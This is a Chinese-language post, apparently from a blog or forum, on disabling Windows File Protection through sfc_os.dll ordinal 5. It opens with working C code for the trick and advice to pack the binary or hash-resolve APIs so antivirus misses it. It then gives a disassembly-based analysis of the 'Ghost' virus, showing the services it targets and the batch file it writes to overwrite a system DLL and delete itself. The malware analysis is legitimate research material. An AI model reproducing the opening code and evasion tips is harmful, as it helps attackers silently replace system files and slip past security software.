利用 sfc_os.dll #5号 api 关闭系统文件保护 篡改系统文件

Windows文件保护对于恶意程序来说是个烦人的东西。尤其是当你想修改系统文件时它就起到保护作用了。这个sfc_os.dll #5号 api也是我在病毒分析时遇到的。它的作用是关闭系统文件保护60秒。

下面给出一个C的源码样例。利用这个时为了避免被查杀最好给程序加壳或者用hash来查找api。

//c code demo
typedef DWORD(__stdcall *CPP) (DWORD param1, PWCHAR param2, DWORD param3);

void Disable_WFP()

{
HINSTANCE hmod=LoadLibrary("sfc_os.dll");
CPP SetSfcFileException;

// the function is stored at the fifth ordinal in sfc_os.dll
SetSfcFileException= (CPP)GetProcAddress(hmod,(LPCSTR)5);

SetSfcFileException(0, L"c://windows//system32//calc.exe",-1);

//Now we can modify the system file in a complete stealth.

}

我再来说说我分析的这个病毒吧。是在看雪里面看到的Ghost病毒有人分析过但是觉得还是有的补充的。http://bbs.pediy.com/showthread.php?t=99266

看到上面的那个关闭系统保护的api可能有人就知道了。这个病毒最核心的思路就是替换系统dll。对于要替换哪个系统dll病毒的作者也做了些工作。首先是查找系统都运行了下面这些预定的服务没。

UPX0:00402228 aAppmgmt db 'AppMgmt',0 ; DATA XREF: UPX0:0040306Co
UPX0:00402230 aSchedule db 'Schedule',0 ; DATA XREF: UPX0:00403068o
UPX0:00402239 align 4
UPX0:0040223C aRemoteregistry db 'RemoteRegistry',0 ; DATA XREF: UPX0:00403064o
UPX0:0040224B align 4
UPX0:0040224C aHelpsvc db 'helpsvc',0 ; DATA XREF: UPX0:00403060o
UPX0:00402254 aCryptsvc db 'CryptSvc',0 ; DATA XREF: UPX0:0040305Co
UPX0:0040225D align 10h
UPX0:00402260 aThemes db 'Themes',0 ; DATA XREF: UPX0:00403058o
UPX0:00402267 align 4
UPX0:00402268 aBrowser db 'Browser',0 ; DATA XREF: UPX0:00403054o
UPX0:00402270 aTapisrv db 'Tapisrv',0 ; DATA XREF: UPX0:00403050o
UPX0:00402278 aNla db 'Nla',0 ; DATA XREF: UPX0:0040304Co
UPX0:0040227C aNetman db 'Netman',0 ; DATA XREF: UPX0:00403048o
UPX0:00402283 align 4
UPX0:00402284 aSsdpsrv db 'SSDPSRV',0 ; DATA XREF: UPX0:00403044o
UPX0:0040228C aUpnphost db 'upnphost',0 ; DATA XREF: UPX0:00403040o
UPX0:00402295 align 4
UPX0:00402298 aNtmssvc db 'Ntmssvc',0 ; DATA XREF: UPX0:0040303Co
UPX0:004022A0 aEventsystem db 'EventSystem',0 ; DATA XREF: UPX0:00403038o
UPX0:004022AC aXmlprov db 'xmlprov',0 ; DATA XREF: UPX0:00403034o
UPX0:004022B4 aWmdmpmsn db 'WmdmPmSN',0 ; DATA XREF: UPX0:00403030o
UPX0:004022BD align 10h
UPX0:004022C0 aFastuserswitch db 'FastUserSwitchingCompatibility',0
UPX0:004022C0 ; DATA XREF: UPX0:0040302Co
UPX0:004022DF align 10h
UPX0:004022E0 aBits db 'BITS',0

如果有再查找与上面服务对应的dll。之后就是关毕文件保护释放资源重写dll。

最后是清理工作新建一个临时文件（批处理类型）

批处理文件 将病毒程序复制替换系统文件然后删除病毒程序

UPX0:0040178F ; int __stdcall sub_40178F(struct _OVERLAPPED Overlapped)
UPX0:0040178F sub_40178F proc near ; CODE XREF: WinMain(x,x,x,x)+1E6p
UPX0:0040178F ; WinMain(x,x,x,x)+31Cp ...
UPX0:0040178F
UPX0:0040178F Filename = byte ptr -728h
UPX0:0040178F Buffer = byte ptr -620h
UPX0:0040178F var_220 = byte ptr -220h
UPX0:0040178F hObject = dword ptr -114h
UPX0:0040178F Dst = byte ptr -110h
UPX0:0040178F Overlapped = _OVERLAPPED ptr -4
UPX0:0040178F
UPX0:0040178F push ebp
UPX0:00401790 mov ebp, esp
UPX0:00401792 sub esp, 728h
UPX0:00401798 or [ebp+hObject], 0FFFFFFFFh
UPX0:0040179F push 104h ; Size
UPX0:004017A4 push 0 ; Val
UPX0:004017A6 lea eax, [ebp+Dst]
UPX0:004017AC push eax ; Dst
UPX0:004017AD call memset
UPX0:004017B2 add esp, 0Ch
UPX0:004017B5 lea eax, [ebp+Dst]
UPX0:004017BB push eax ; lpBuffer
UPX0:004017BC push 104h ; nBufferLength
UPX0:004017C1 call GetTempPathA
UPX0:004017C7 push offset aTempdel_bat ; "TempDel.bat"
UPX0:004017CC lea eax, [ebp+Dst] ; dst:%temp_path%.tempdel.bat
UPX0:004017D2 push eax
UPX0:004017D3 call lstrcat
UPX0:004017D9 push 104h ; Size
UPX0:004017DE push 0 ; Val
UPX0:004017E0 lea eax, [ebp+Filename]
UPX0:004017E6 push eax ; Dst
UPX0:004017E7 call memset
UPX0:004017EC add esp, 0Ch
UPX0:004017EF push 104h ; nSize
UPX0:004017F4 lea eax, [ebp+Filename]
UPX0:004017FA push eax ; lpFilename
UPX0:004017FB push 0 ; hModule
UPX0:004017FD call GetModuleFileNameA
UPX0:00401803 push 104h ; Size
UPX0:00401808 push 0 ; Val
UPX0:0040180A lea eax, [ebp+var_220]
UPX0:00401810 push eax ; Dst
UPX0:00401811 call memset
UPX0:00401816 add esp, 0Ch
UPX0:00401819 cmp dword ptr [ebp+Overlapped.anonymous_0+4], 1
UPX0:0040181D jnz short loc_401839
UPX0:0040181F push offset dll_path
UPX0:00401824 push offset aSDllcacheLsasv ; "%s\\dllcache\\lsasvc.dll"
UPX0:00401829 lea eax, [ebp+var_220]
UPX0:0040182F push eax ; LPSTR
UPX0:00401830 call wsprintfA
UPX0:00401836 add esp, 0Ch
UPX0:00401839
UPX0:00401839 loc_401839: ; CODE XREF: sub_40178F+8Ej
UPX0:00401839 push 400h ; Size
UPX0:0040183E push 0 ; Val
UPX0:00401840 lea eax, [ebp+Buffer]
UPX0:00401846 push eax ; Dst
UPX0:00401847 call memset
UPX0:0040184C add esp, 0Ch
UPX0:0040184F lea eax, [ebp+Dst]
UPX0:00401855 push eax
UPX0:00401856 lea eax, [ebp+Filename]
UPX0:0040185C push eax
UPX0:0040185D lea eax, [ebp+Filename]
UPX0:00401863 push eax
UPX0:00401864 lea eax, [ebp+var_220]
UPX0:0040186A push eax
UPX0:0040186B lea eax, [ebp+Filename]
UPX0:00401871 push eax
UPX0:00401872 push offset aCopyYSSRunagai ; "copy /Y \"%s\" \"%s\"\r\n:runagain\r\ndel \"%s\"\r"...
UPX0:00401877 lea eax, [ebp+Buffer]
UPX0:0040187D push eax ; LPSTR
UPX0:0040187E call wsprintfA ; copy /Y "C:\ghos y样本\Ghost.exe"
UPX0:0040187E ; "C:\WINDOWS\system32\dllcache\lsasvc.dll"..
UPX0:0040187E ; :runagain..del "C:\ghosy样本\Ghost.exe"..
UPX0:0040187E ; if exist "C\ghosy样本\Ghost.exe" goto runa gain.
UPX0:0040187E ; .del "C:\DO CUME~1\mike\LOCA LS~1\Temp\TempDe
UPX0:0040187E ;
UPX0:00401884 add esp, 1Ch
UPX0:00401887 push 0 ; hTemplateFile
UPX0:00401889 push 80h ; dwFlagsAndAttributes
UPX0:0040188E push 2 ; dwCreationDisposition
UPX0:00401890 push 0 ; lpSecurityAttributes
UPX0:00401892 push 0 ; dwShareMode
UPX0:00401894 push 0C0000000h ; dwDesiredAccess
UPX0:00401899 lea eax, [ebp+Dst]
UPX0:0040189F push eax ; lpFileName
UPX0:004018A0 call CreateFileA ; 创建临时文件
UPX0:004018A0 ; 0012EBF0 0012F224 |FileName = "C:\DOCUME~1\mike\LOCALS~1\Temp\TempDel.bat"
UPX0:004018A0 ; 0012EBF4 C0000000 |Access = GENERIC_READ|GENERIC_WRITE
UPX0:004018A0 ; 0012EBF8 00000000 |ShareMode = 0
UPX0:004018A0 ; 0012EBFC 00000000 |pSecurity = NULL
UPX0:004018A0 ; 0012EC00 00000002 |Mode = CREATE_ALWAYS
UPX0:004018A0 ; 0012EC04 00000080 |Attributes = NORMAL
UPX0:004018A0 ; 0012EC08 00000000 \hTemplateFile = NULL
UPX0:004018A0 ;
UPX0:004018A0 ;
UPX0:004018A6 mov [ebp+hObject], eax
UPX0:004018AC cmp [ebp+hObject], 0FFFFFFFFh
UPX0:004018B3 jnz short loc_4018B7
UPX0:004018B5 jmp short locret_40190C
UPX0:004018B7 ; ---------------------------------------------------------------------------
UPX0:004018B7
UPX0:004018B7 loc_4018B7: ; CODE XREF: sub_40178F+124j
UPX0:004018B7 push 0
UPX0:004018B9 lea eax, [ebp+Overlapped]
UPX0:004018BC push eax ; lpOverlapped
UPX0:004018BD lea eax, [ebp+Buffer]
UPX0:004018C3 push eax ; lpNumberOfBytesWritten
UPX0:004018C4 call lstrlen
UPX0:004018CA push eax ; nNumberOfBytesToWrite
UPX0:004018CB lea eax, [ebp+Buffer]
UPX0:004018D1 push eax ; lpBuffer
UPX0:004018D2 push [ebp+hObject] ; hFile
UPX0:004018D8 call WriteFile
UPX0:004018DE push [ebp+hObject] ; hObject
UPX0:004018E4 call CloseHandle ; 创建的是一个批处理的临时文件，内容在上面
UPX0:004018EA push 0
UPX0:004018EC push 0
UPX0:004018EE push 0
UPX0:004018F0 lea eax, [ebp+Dst]
UPX0:004018F6 push eax
UPX0:004018F7 push offset aOpen ; "open"
UPX0:004018FC push 0
UPX0:004018FE call p_shellexecute
UPX0:00401904 push 0 ; uExitCode
UPX0:00401906 call ExitProcess
UPX0:0040190C ; ---------------------------------------------------------------------------
UPX0:0040190C
UPX0:0040190C locret_40190C: ; CODE XREF: sub_40178F+126j

最后还忘记了这个病毒是upx壳。脱壳也不费什么劲菜鸟我就不赘述了。